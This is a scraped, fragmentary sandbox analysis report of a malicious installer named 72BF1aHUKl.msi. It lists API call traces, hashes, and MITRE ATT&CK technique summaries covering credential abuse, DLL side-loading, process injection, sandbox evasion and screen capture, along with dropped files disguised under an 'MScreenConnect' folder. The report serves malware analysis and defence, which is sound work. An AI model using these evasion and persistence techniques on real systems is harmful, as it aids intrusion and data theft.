LeaveCriticalSection.KERNEL32(111D89EC,?,?,1100C13B,00000000,00000000), ref: 1100D7F0

Part of subcall function 1100D6E0: EnterCriticalSection.KERNEL32(111D89EC,1100CA4A,?,1100B4AC,?,00000000,?,1100CA4A,?), ref: 1100D6E9
Part of subcall function 1100D6E0: LeaveCriticalSection.KERNEL32(111D89EC,1100B4AC,?,00000000,?,1100CA4A,?), ref: 1100D761

LeaveCriticalSection.KERNEL32(111D89EC), ref: 1100D7BF
LeaveCriticalSection.KERNEL32(111D89EC), ref: 1100D7DB

Part of subcall function 1100D690: EnterCriticalSection.KERNEL32(111D89EC,1100C3CB), ref: 1100D695
Part of subcall function 1100D690: LeaveCriticalSection.KERNEL32(111D89EC), ref: 1100D6CF

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Enter
String ID:
API String ID: 2978645861-0
Opcode ID: aca24964a8334ab7ee8cd89ad2ace1eb3ed66267a62d89fe4e8a6cc7f4fed172
Instruction ID: 0dafe6cd7310c593e9f50b724afca6883deab30faa1009faaa9d0ca0fe2b91f1
Opcode Fuzzy Hash: aca24964a8334ab7ee8cd89ad2ace1eb3ed66267a62d89fe4e8a6cc7f4fed172
Instruction Fuzzy Hash: FC01A736F122246BDB01DFE5AC49A9DFB9CEB4A699B0441A5FC4DD3600F631AD0087F2

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 72BF1aHUKl.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\519b7b.rbs

C:\ProgramData\MScreenConnect\AudioCapture.dll

C:\ProgramData\MScreenConnect\Driver.VeeamFLR.log

C:\ProgramData\MScreenConnect\HTCTL32.DLL

C:\ProgramData\MScreenConnect\NSM.lic

C:\ProgramData\MScreenConnect\PCICHEK.DLL

C:\ProgramData\MScreenConnect\PCICL32.DLL

C:\ProgramData\MScreenConnect\TCCTL32.DLL

C:\ProgramData\MScreenConnect\UIManagerBrokerps.dll

C:\ProgramData\MScreenConnect\Veeam.Backup.Model.dll

C:\ProgramData\MScreenConnect\WerEnc.dll

C:\ProgramData\MScreenConnect\appverifUI.dll

Windows Analysis Report
72BF1aHUKl.msi

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre